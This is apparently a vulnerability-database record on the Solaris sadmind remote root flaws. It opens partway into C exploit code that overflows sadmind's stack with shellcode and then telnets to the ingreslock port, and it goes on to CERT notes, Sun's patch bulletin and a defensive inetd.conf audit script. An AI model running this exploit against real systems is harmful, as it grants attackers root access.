*prog)\r\n{\r\n\tfprintf(stderr, \"usage: %s -t target -a arch [-s size]\", prog);\r\n\tfprintf(stderr, \" [-i increment] [-p]\\n\");\r\n\tfprintf(stderr, \"\\tarchitectures:\\n\");\r\n\tfprintf(stderr, \"\\t0 - Solaris SPARC 2.6\\n\");\r\n\tfprintf(stderr, \"\\t1 - Solaris SPARC 2.7 (7.0)\\n\");\r\n\tfprintf(stderr, \"\\t2 - Solaris x86 2.6\\n\");\r\n\tfprintf(stderr, \"\\t3 - Solaris x86 2.7 (7.0)\\n\\n\");\r\n\r\n\texit(-1);\t\r\n}\r\n\r\nint exp(char *host, int arch, unsigned long int sp, int pinging)\r\n{\r\n\tCLIENT *cl;\r\n\tstruct nm_send send;\r\n\tstruct nm_reply reply;\r\n\tstruct timeval tm;\r\n\tenum clnt_stat stat;\r\n\tint c, i, len, slen, clen, junk, a;\r\n\tchar *cp, *buf;\r\n\tunsigned long int addr, fp;\r\n\t\r\n\ta = (int) arch / 2;\t\r\n\tbuf = (char *) malloc(buflen[a] + 1);\r\n\r\n\tif(a)\r\n\t{\r\n\t\t/* Solaris x86 */\r\n\t\tmemset(buf, nops[a], buflen[a]);\r\n\t\tjunk = junks[arch - 2];\r\n\t\tjunk &= 0xfffffffc;\r\n\r\n\t\tfor (i = 0, cp = buf + alignment[a]; i < junk / 4; i++) \r\n\t\t{\r\n\t\t\t*cp++ = (sp >> 0) & 0xff;\r\n\t\t\t*cp++ = (sp >> 8) & 0xff;\r\n\t\t\t*cp++ = (sp >> 16) & 0xff;\r\n\t\t\t*cp++ = (sp >> 24) & 0xff;\r\n\t\t}\r\n\r\n\t\taddr = sp + offset[a];\r\n\r\n\t\tfor (i = 0; i < addrlen[a] / 4; i++) \r\n\t\t{\r\n\t\t\t*cp++ = (addr >> 0) & 0xff;\r\n\t\t\t*cp++ = (addr >> 8) & 0xff;\r\n\t\t\t*cp++ = (addr >> 16) & 0xff;\r\n\t\t\t*cp++ = (addr >> 24) & 0xff;\r\n\t\t}\r\n\r\n\t\tslen = strlen(shellx86); \r\n\t\tclen = strlen(command);\r\n\t\tlen = clen; \r\n\t\tlen++; \r\n\t\tlen = -len;\r\n\t\tshellx86[lens[a]+0] = (len >> 0) & 0xff;\r\n\t\tshellx86[lens[a]+1] = (len >> 8) & 0xff;\r\n\t\tshellx86[lens[a]+2] = (len >> 16) & 0xff;\r\n\t\tshellx86[lens[a]+3] = (len >> 24) & 0xff;\r\n\t\tcp = buf + buflen[a] - 1 - clen - slen;\r\n\t\tmemcpy(cp, shellx86, slen); \r\n\t\tcp += slen;\r\n\t\tmemcpy(cp, command, clen); \r\n\t\tcp += clen;\r\n\t\t*cp = '\\xff';\r\n\t}\r\n\telse\r\n\t{\r\n\t\t/* Solaris SPARC */\r\n\t\tmemset(buf, 
'\\xff', buflen[a]);\r\n\t\tfp = sp + FRAMELEN1 + FRAMELEN2;\r\n\t\tfp &= 0xfffffff8;\r\n\t\taddr = sp + offset[a];\r\n\t\taddr &= 0xfffffffc;\r\n\r\n\t\tfor(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)\r\n\t\t{\r\n\t\t\t*cp++ = (fp >> 24) & 0xff;\r\n\t\t\t*cp++ = (fp >> 16) & 0xff;\r\n\t\t\t*cp++ = (fp >> 8) & 0xff;\r\n\t\t\t*cp++ = (fp >> 0) & 0xff;\r\n\t\t\t*cp++ = (addr >> 24) & 0xff;\r\n\t\t\t*cp++ = (addr >> 16) & 0xff;\r\n\t\t\t*cp++ = (addr >> 8) & 0xff;\r\n\t\t\t*cp++ = (addr >> 0) & 0xff;\r\n\t\t}\r\n\t\t\r\n\t\tslen = strlen(shellsparc);\r\n\t\tclen = strlen(command);\r\n\t\tlen = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];\r\n\t\tlen &= 0xfffffffc;\r\n\t\tfor(i = 0; i < lens[a] / 4; i++)\r\n\t\t{\r\n\t\t\t*cp++ = (nops[a] >> 24) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 16) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 8) & 0xff;\r\n\t\t\t*cp++ = (nops[a] >> 0) & 0xff;\r\n\t\t}\r\n\t\tlen = clen;\r\n\t\tlen++;\r\n\t\tlen = -len;\r\n\t\tshellsparc[lens[a]+0] = (len >> 24) & 0xff;\r\n\t\tshellsparc[lens[a]+1] = (len >> 16) & 0xff;\r\n\t\tshellsparc[lens[a]+2] = (len >> 8) & 0xff;\r\n\t\tshellsparc[lens[a]+3] = (len >> 0) & 0xff;\r\n\t\tmemcpy(cp, shellsparc, slen);\r\n\t\tcp += slen;\r\n\t\tmemcpy(cp, command, clen);\r\n\t}\r\n\r\n\tbuf[buflen[a]] = '\\0';\r\n\tmemset(&send, 0, sizeof(struct nm_send));\r\n\tsend.header.uint2 = NETMGT_HEADER_TYPE;\r\n\tsend.header.string1 = \"\";\r\n\tsend.header.string2 = \"\";\r\n\tsend.header.string3 = \"\";\r\n\tsend.header.uint7 =\r\n\t\tstrlen(FW_VERSION) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\t\tstrlen(CLIENT_DOMAIN) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n\t\tstrlen(FENCE) + 1 +\r\n\t\t(4 * sizeof(unsigned int)) + sizeof(int) +\r\n\t\tstrlen(NETMGT_ENDOFARGS) + 1;\r\n\tsend.version.string1 = FW_VERSION;\r\n\tsend.version.uint1 = NETMGT_ARG_INT;\r\n\tsend.version.uint2 = sizeof(int);\r\n\tsend.version.int1 = 1;\r\n\tsend.string.string1 = 
CLIENT_DOMAIN;\r\n\tsend.string.uint1 = NETMGT_ARG_STRING;\r\n\tsend.string.uint2 = strlen(buf);\r\n\tsend.string.string2 = buf;\r\n\tsend.fence.string1 = FENCE;\r\n\tsend.fence.uint1 = NETMGT_ARG_INT;\r\n\tsend.fence.uint2 = sizeof(int);\r\n\tsend.fence.int1 = 666;\r\n\tsend.footer.string1 = NETMGT_ENDOFARGS;\r\n\tcl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n\r\n\tif (cl == NULL) \r\n\t{\r\n\t\tclnt_pcreateerror(\"clnt_create\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tcl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n\r\n\tif (!pinging) \r\n\t{\r\n\t\ttm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tstat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n\t\t\txdr_nm_send, (caddr_t) &send,\r\n\t\t\txdr_nm_reply, (caddr_t) &reply, tm);\r\n\r\n\t\tif (stat != RPC_SUCCESS) \r\n\t\t{\r\n\t\t\tclnt_perror(cl, \"clnt_call\");\r\n\t\t\tfprintf(stdout, \"now check if exploit worked;\\n\");\r\n\t\t\treturn 0;\r\n\t\t}\r\n\r\n\t\tfprintf(stderr, \"exploit failed; \"\r\n\t\t\t\"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n\t\t\treply.uint1, reply.uint2, reply.string1);\r\n\t\tclnt_destroy(cl);\r\n\t\texit(1);\r\n\t} \r\n\telse \r\n\t{\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_PING_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\ttm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; \r\n\t\ttm.tv_usec = 0;\r\n\r\n\t\tif (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) 
\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"unable to set timeout\\n\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tstat = clnt_call(cl, NETMGT_PROC_PING,\r\n\t\t\txdr_void, NULL,\r\n\t\t\txdr_void, NULL, tm);\r\n\r\n\t\tif (stat != RPC_SUCCESS) \r\n\t\t{\r\n\t\t\tclnt_perror(cl, \"clnt_call\");\r\n\t\t\texit(1);\r\n\t\t}\r\n\r\n\t\tclnt_destroy(cl);\r\n\t\treturn 0;\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tint i, arch;\r\n\tchar *host = \"\";\r\n\tint pinging = 0, inc = 4, size = 2048;\r\n\tunsigned long int addr;\r\n\r\n\tfor(i=0;i<argc;i++)\r\n\t{\r\n\t\tif(!strcmp(argv[i], \"-t\"))\r\n\t\t\thost = argv[i+1];\t\r\n\t\tif(!strcmp(argv[i], \"-a\"))\r\n\t\t\tarch = atoi(argv[i+1]);\r\n\t\tif(!strcmp(argv[i], \"-i\"))\r\n\t\t\tinc = atoi(argv[i+1]);\r\n\t\tif(!strcmp(argv[i], \"-s\"))\r\n\t\t\tsize = atoi(argv[i+1]);\t\r\n\t\tif(!strcmp(argv[i], \"-p\"))\r\n\t\t\tpinging = 1;\r\n\t}\r\n\r\n\tif(arch > 3 || arch < 0)\r\n\t\tusage(argv[0]);\r\n\tif(size < 0)\r\n\t\tusage(argv[0]);\r\n\tif(inc < 0)\r\n\t\tusage(argv[0]);\r\n\r\n\tfor(i = 0; i < size; i+=inc)\r\n\t{\r\n\t\taddr = sp[arch] + i;\r\n\t\texp(host, arch, addr, pinging); \r\n\t\taddr = sp[arch] - i;\r\n\t\texp(host, arch, addr, pinging);\r\n\t}\r\n\r\n\texecl(\"telnet\", host, \"ingreslock\");\r\n\r\n\treturn 0;\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19672/"}], "cert": [{"lastseen": "2020-09-18T20:45:06", "bulletinFamily": "info", "cvelist": ["CVE-1999-0977"], "description": "### Overview \n\nThe sadmind program can be used to perform distributed system administration operations remotely using RPC. A stack buffer overflow in sadmind may be exploited by a remote attacker to execute arbitrary instructions and gain root access.\n\n### Description \n\nThe sadmind program is installed by default in Solaris 2.5, 2.5.1, 2.6, and 7. 
In Solaris 2.3 and 2.4, sadmind may be installed if the Sun Solstice Adminsuite packages are installed. The sadmind program is installed in /usr/sbin and can be used to coordinate distributed system administration operations remotely. The sadmind daemon is started automatically by the inetd daemon whenever a request to perform a system administration operation is received. \n\nAll versions of sadmind are vulnerable to a buffer overflow that can overwrite the stack pointer within a running sadmind process. Since sadmind is installed as root, it is possible to execute arbitrary code with root privileges on a remote machine. \n \nThis vulnerability has been discussed in public security forums and is actively being exploited by intruders. \n \n--- \n \n### Impact \n\nA remote user may be able to execute arbitrary code with root privileges on systems running vulnerable versions of sadmind. \n \n--- \n \n### Solution \n\nFrom Sun Security Bulletin #00191: \n \nSun announces the release of patches for Solaris(tm) 7, 2.6, 2.5.1, \n2.5, 2.4, and 2.3 (SunOS(tm) 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which \nrelate to a vulnerability with sadmind. \n \nSun recommends that you install the patches listed in section 4 \nimmediately on systems running SunOS 5.7, 5.6, 5.5.1, and 5.5 and \non systems with Solstice AdminSuite (AdminSuite) installed. If you have \ninstalled a version of AdminSuite prior to version 2.3, please upgrade \nto AdminSuite 2.3 before installing the AdminSuite patches listed in \nsection 4. \n \nSun also recommends that you: \n \n\\- disable sadmind if you do not use it by commenting the \nfollowing line in /etc/inetd.conf: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind \n \n\\- set the security level used to authenticate requests to STRONG \nas follows, if you use sadmind: \n \n100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2 \n \nThe above changes to /etc/inetd.conf will take effect after inetd \nreceives a hang-up signal. 
---

Another workaround to prevent remote intruders from accessing any vulnerable RPC services is to block all access to ports 111/{tcp,udp} at your site's network perimeter. Note that this hides the portmapper registration but does not close the service: sadmind itself listens on a separate port, and an attacker who already knows that port, or finds it by scanning, can call the daemon directly. Filter the service ports too, or better, disable or patch sadmind as above.

---

### Vendor Information

VU#28934

### Sun (Affected)

Notified: December 13, 1999. Updated: May 07, 2001

### Status

Affected

### Vendor Statement

Please see [Sun Security Bulletin #191](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba>). An excerpt is provided below.

### Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

### Addendum

-----BEGIN PGP SIGNED MESSAGE-----

________________________________________________________________________________
Sun Microsystems, Inc. Security Bulletin

Bulletin Number: #00191
Date: December 29, 1999
Cross-Ref: CERT CA-99-16
Title: sadmind
________________________________________________________________________________

The information contained in this Security Bulletin is provided "AS IS." Sun makes no warranties of any kind whatsoever with respect to the information contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.

IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer to be otherwise enforceable in such jurisdiction.
________________________________________________________________________________

1. Bulletins Topics

Sun announces the release of patches for Solaris(tm) 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS(tm) 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind.

Sun recommends that you install the patches listed in section 4 immediately on systems running SunOS 5.7, 5.6, 5.5.1, and 5.5 and on systems with Solstice AdminSuite (AdminSuite) installed. If you have installed a version of AdminSuite prior to version 2.3, please upgrade to AdminSuite 2.3 before installing the AdminSuite patches listed in section 4.

Sun also recommends that you:

- disable sadmind if you do not use it by commenting the following line in /etc/inetd.conf:

      100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind

- set the security level used to authenticate requests to STRONG as follows, if you use sadmind:

      100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2

The above changes to /etc/inetd.conf will take effect after inetd receives a hang-up signal.

2. Who is Affected

Vulnerable: SunOS 5.7, 5.7_x86, 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, and 5.4, 5.4_x86, and 5.3 with AdminSuite installed

Not vulnerable: All other supported versions of SunOS.

3. Understanding the Vulnerability

The sadmind program is installed by default on SunOS 5.7, 5.6, 5.5.1, and 5.5. In SunOS 5.4 and 5.3, sadmind may be installed if the Solstice AdminSuite packages are installed. The sadmind program is installed in /usr/sbin. The program can be used to perform distributed system administration operations remotely. A buffer overflow vulnerability has been discovered in sadmind which may be exploited by a remote attacker to execute arbitrary instructions and gain root access.

4. List of Patches

The following patches are available in relation to the above problem.

    OS Version          Patch ID
    __________          _________
    SunOS 5.7           108662-01
    SunOS 5.7_x86       108663-01
    SunOS 5.6           108660-01
    SunOS 5.6_x86       108661-01
    SunOS 5.5.1         108658-01
    SunOS 5.5.1_x86     108659-01
    SunOS 5.5           108656-01
    SunOS 5.5_x86       108657-01

    AdminSuite Version  Patch ID
    __________________  ________
    2.3                 104468-18 (see Note)
    2.3_x86             104469-18 (see Note)

Note: Install patch if AdminSuite is installed. AdminSuite may be installed on SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 or 5.3.
_______________________________________________________________________________

Sun acknowledges, with thanks, Stanford University and the CERT Coordination Center for their assistance in this matter.
_______________________________________________________________________________
APPENDICES

A. Patches listed in this bulletin are available to all Sun customers at:

    http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches

B. Checksums for the patches listed in this bulletin are available at:

    ftp://sunsolve.sun.com/pub/patches/CHECKSUMS

C. Sun security bulletins are available at:

    http://sunsolve.sun.com/pub-cgi/secBulletin.pl

D. Sun Security Coordination Team's PGP key is available at:

    http://sunsolve.sun.com/pgpkey.txt

E. To report or inquire about a security problem with Sun software, contact one or more of the following:

- Your local Sun answer centers
- Your representative computer security response team, such as CERT
- Sun Security Coordination Team. Send email to: security-alert@sun.com

F. To receive information or subscribe to our CWS (Customer Warning System) mailing list, send email to security-alert@sun.com with a subject line (not body) containing one of the following commands:

    Command         Information Returned/Action Taken
    _______         _________________________________

    help            An explanation of how to get information

    key             Sun Security Coordination Team's PGP key

    list            A list of current security topics

    query [topic]   The email is treated as an inquiry and is forwarded to
                    the Security Coordination Team

    report [topic]  The email is treated as a security report and is
                    forwarded to the Security Coordination Team. Please
                    encrypt sensitive mail using Sun Security Coordination
                    Team's PGP key

    send topic      A short status summary or bulletin. For example, to
                    retrieve a Security Bulletin #00138, supply the
                    following in the subject line (not body):

                        send #138

    subscribe       Sender is added to our mailing list. To subscribe,
                    supply the following in the subject line (not body):

                        subscribe cws your-email-address

                    Note that your-email-address should be substituted
                    by your email address.

    unsubscribe     Sender is removed from the CWS mailing list.
________________________________________________________________________________

Copyright 1999 Sun Microsystems, Inc.
All rights reserved. Sun, Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks of Sun Microsystems, Inc. in the United States and other countries. This Security Bulletin may be reproduced and distributed, provided that this Security Bulletin is not modified in any way and is attributed to Sun Microsystems, Inc. and provided that such reproduction and distribution is performed for non-commercial purposes.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBOGpY1bdzzzOFBFjJAQGKyQP/UX8fxEBWd/CXSdvcbrIOqiUafGcHvJ0R
+/iQHifs5Uu7Zhgukzl4MLnN1Io1MgJFRsnesBMuRsPKxirckE3riLTkkLcmtHgF
2nxXLSenYCqHS2lcWZg5L1y3bTWUBBkjBZw9LXwgFmZ1m63e5C7TOOKp9mp3tybQ
JpyRVNynR8E=
=sANI
-----END PGP SIGNATURE-----

### CVSS Metrics

Not recorded in the note.

### References

[http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba>)

### Acknowledgements

This document was written by Jeff S Havrilla.

### Other Information

**CVE IDs:** | [CVE-1999-0977](<http://web.nvd.nist.gov/vuln/detail/CVE-1999-0977>)
---|---
**CERT Advisory:** | [CA-1999-16](<http://www.cert.org/advisories/CA-1999-16.html>)
**Severity Metric:** | 73.10
**Date Public:** | 1999-12-14
**Date First Published:** | 2001-05-07
**Date Last Updated:** | 2001-05-16 15:11 UTC
**Document Revision:** | 5

Entry VU:28934, https://www.kb.cert.org/vuls/id/28934 (published 2001-05-07T00:00:00, modified 2001-05-16T15:11:00)
Title: Sun Solaris sadmind buffer overflow in amsl_verify when requesting NETMGT_PROC_SERVICE
CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CERT Vulnerability Note VU:41870
ID VU:41870 Type cert CVE CVE-1999-0977, CVE-2003-0722 Last seen 2020-09-18T20:44:11

### Overview

The sadmind service provided on many Solaris and SunOS systems ships with an insecure default configuration that allows remote users to execute arbitrary commands with superuser (root) privileges.

### Description

The Sun Microsystems Solstice AdminSuite is a graphical tool that allows Solaris and SunOS hosts to be administered by a remote host. The daemon portion of the program (sadmind) is a setuid root application that listens for requests from a remote administration client. In its default configuration, sadmind accepts requests using "AUTH_SYS" authentication. AUTH_SYS credentials are nothing more than the caller's claimed uid, gid and hostname sent in the clear in the RPC call header, with no secret behind them, so a client can assert any identity it likes, including uid 0. Since sadmind is designed to allow the remote execution of arbitrary commands, an attacker who forges the authentication portion of a request can execute commands with little difficulty.

The daemon can be configured to operate securely by specifying a security level of 2, which causes sadmind to require "AUTH_DES" authentication. This capability has existed since at least April 1999, when the [sadmind man page](<http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view>) was updated for SunOS 5.9. The recommendation to use security level 2 was provided in [Sun Security Bulletin #00191](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=secbull%2F191&display=plain>) and [CERT Advisory CA-1999-16](<http://www.cert.org/advisories/CA-1999-16.html>), so it is likely that many Solaris systems have been configured to disable this service. However, the insecure default configuration is still shipped with modern releases of Solaris, so system administrators are encouraged to review their configurations. Note that this is a separate problem from the overflow in VU#28934 above: applying the overflow patches does not change the default authentication level.

---

### Impact

Affected systems allow remote users to execute arbitrary commands with the privileges of the sadmind daemon, typically superuser (root).

---

### Solution

The CERT/CC is not aware of a permanent solution that addresses this vulnerability.

---

**Configure sadmind to use AUTH_DES authentication**

As recommended by [Sun Alert 56740](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>), users can take the following steps to enable AUTH_DES authentication:

1. Edit the "/etc/inetd.conf" file and append "-S 2" to the end of the sadmind line as follows:

       100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2

2. Tell the inetd(1M) process to reread the newly modified "/etc/inetd.conf" file by sending it a hangup signal, SIGHUP:

       # /usr/bin/pkill -HUP inetd

AUTH_DES is Secure RPC: it needs keyserv running and public-key credentials set up for the hosts and users that will call sadmind, and a client without them is refused. Verify that your AdminSuite clients still work after the change; if Secure RPC is not deployed, the practical effect of -S 2 is the same as disabling the service.

**Disable the sadmind daemon**

As recommended by [Sun Alert 56740](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>), users can take the following steps to disable sadmind:

1. Edit the "/etc/inetd.conf" file and comment out the following line by adding the "#" symbol to the beginning of the line as follows:

       #100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind

2. Tell the inetd(1M) process to reread the newly modified "/etc/inetd.conf" file by sending it a hangup signal, SIGHUP:

       # /usr/bin/pkill -HUP inetd

---

### Vendor Information

VU#41870

### Sun Microsystems Inc. (Affected)
Notified: April 03, 1999. Updated: September 19, 2003

### Status

Affected

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

The vendor has not provided us with any further information regarding this vulnerability.

### Addendum

Sun Microsystems has published Alert Notification 56740 to document this vulnerability. For more information, please see:

[http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?type=0&doc=fsalert%2F56740&display=plain>)

### CVSS Metrics

Not recorded in the note.

### References

 * [http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740&zone_32=category%3Asecurity](<http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F56740&zone_32=category%3Asecurity>)
 * <http://docs.sun.com/db/doc/816-0211/6m6nc676b?a=view>
 * <http://www.idefense.com/advisory/09.16.03.txt>
 * <http://www.cert.org/advisories/CA-1999-16.html>
 * <http://www.kb.cert.org/vuls/id/28934>
 * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0977>
 * <http://www.secunia.com/advisories/9742/>

### Acknowledgements

The CERT/CC thanks Sun Microsystems for acknowledging this vulnerability.

This document was written by Jeffrey P. Lanza.

### Other Information

**CVE IDs:** | [CVE-2003-0722](<http://web.nvd.nist.gov/vuln/detail/CVE-2003-0722>)
---|---
**Severity Metric:** | 104.74
**Date Public:** | 1999-04-03
**Date First Published:** | 2003-09-19
**Date Last Updated:** | 2003-09-19 22:01 UTC
**Document Revision:** | 22

Entry VU:41870, https://www.kb.cert.org/vuls/id/41870 (published 2003-09-19T00:00:00, modified 2003-09-19T22:01:00)
Title: Sun Solstice AdminSuite ships with insecure default configuration
CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
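Both Solution sections above (Sun Bulletin #00191 in VU:28934 and Sun Alert 56740 in VU:41870) come down to the same two edits of /etc/inetd.conf, commenting the sadmind line out or appending -S 2 to it, followed by a SIGHUP to inetd, while the VU:28934 workaround of filtering 111/{tcp,udp} still leaves sadmind's own port reachable. The script below is an added example, not code from CERT or from Sun, that turns those steps into checks you can run on a copy of the file before touching the live one: it classifies the sadmind entry (absent, disabled, weak, strong), rewrites an active entry to -S 2 without doubling the flag, comments it out for the disable route, and reads saved rpcinfo -p output for a live registration of program 100232. The inetd.conf contents and the rpcinfo output are constructed for the example, the function names are mine, and the rpcinfo parsing assumes the usual five-column "program vers proto port service" layout.

```shell
#!/bin/sh
# Added example (not from the CERT notes or from Sun): audit the sadmind entry
# of an inetd.conf, rewrite it to the AUTH_DES level (-S 2) the advisories
# recommend, or comment it out, and spot a live sadmind registration (RPC
# program 100232) in saved "rpcinfo -p" output. Every function works on a
# file you pass in, so it can be run on a copy before the real /etc/inetd.conf.
# The sample configs and the rpcinfo output below are constructed.

# sadmind_status FILE -> absent | disabled | weak | strong
#   disabled : only commented-out sadmind lines (the "disable it" fix)
#   weak     : active line without -S 2, i.e. the shipped AUTH_SYS default
#   strong   : active line with -S 2 (AUTH_DES), Sun's "STRONG" setting
sadmind_status() {
    awk '
        /sadmind/ {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (line ~ /^#/) { if (status == "") status = "disabled"; next }
            if (line ~ /-S[ \t]*2([ \t]|$)/) status = "strong"; else status = "weak"
            exit                        # first active entry decides
        }
        END { print (status == "" ? "absent" : status) }
    ' "$1"
}

# sadmind_harden_file FILE -> FILE on stdout with active sadmind lines at -S 2
#   An existing -S level is replaced, a missing one appended, comments untouched.
sadmind_harden_file() {
    sed -e '/^[[:space:]]*#/b' \
        -e '/sadmind/{' \
        -e '/-S[[:space:]]*[0-9]/!s/$/ -S 2/' \
        -e 's/-S[[:space:]]*[0-9]/-S 2/' \
        -e '}' "$1"
}

# sadmind_disable_file FILE -> FILE on stdout with active sadmind lines commented
sadmind_disable_file() {
    sed '/^[[:space:]]*#/!s/^.*sadmind/#&/' "$1"
}

# sadmind_rpc_ports FILE -> "proto port" per registration of program 100232
#   FILE holds saved "rpcinfo -p host" output. A hit means the daemon is
#   reachable on that port directly, whatever the perimeter does about 111.
sadmind_rpc_ports() {
    awk '$1 == "100232" { print $3, $4 }' "$1"
}

WORK=$(mktemp -d)

# constructed: the shipped default, the insecure configuration of VU:41870
SAMPLE_WEAK="$WORK/inetd.conf.weak"
cat > "$SAMPLE_WEAK" <<'EOF'
ftp       stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd
100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind
EOF

# constructed: sadmind already commented out
SAMPLE_DISABLED="$WORK/inetd.conf.disabled"
printf '#100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind\n' > "$SAMPLE_DISABLED"

# constructed: no sadmind entry at all
SAMPLE_ABSENT="$WORK/inetd.conf.absent"
printf 'ftp stream tcp nowait root /usr/sbin/in.ftpd in.ftpd\n' > "$SAMPLE_ABSENT"

# constructed: what "rpcinfo -p" shows for a host still offering sadmind
SAMPLE_RPCINFO="$WORK/rpcinfo.txt"
cat > "$SAMPLE_RPCINFO" <<'EOF'
   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    4   udp    111  rpcbind
    100232   10   udp  32773  sadmind
EOF

# both fixes, written to new files rather than in place
HARDENED="$WORK/inetd.conf.hardened"
sadmind_harden_file "$SAMPLE_WEAK" > "$HARDENED"
DISABLED="$WORK/inetd.conf.commented"
sadmind_disable_file "$SAMPLE_WEAK" > "$DISABLED"

for f in "$SAMPLE_WEAK" "$SAMPLE_DISABLED" "$SAMPLE_ABSENT" "$HARDENED" "$DISABLED"; do
    printf '%-22s sadmind: %s\n' "$(basename "$f")" "$(sadmind_status "$f")"
done
printf 'sadmind registered on: %s\n' "$(sadmind_rpc_ports "$SAMPLE_RPCINFO" | tr '\n' ' ')"

# On a real Solaris 2.x host the same functions apply to the live files:
#   sadmind_status /etc/inetd.conf
#   sadmind_harden_file /etc/inetd.conf > /etc/inetd.conf.new   # review it, then
#   cp /etc/inetd.conf.new /etc/inetd.conf && /usr/bin/pkill -HUP inetd
#   rpcinfo -p target > /tmp/rpc.txt && sadmind_rpc_ports /tmp/rpc.txt
```

The hardening pass is idempotent (a second run leaves a single -S 2), which matters when the script is folded into configuration management. Running sadmind_rpc_ports against rpcinfo -p output taken from outside the perimeter tells you whether the daemon is still reachable regardless of what the firewall does with port 111.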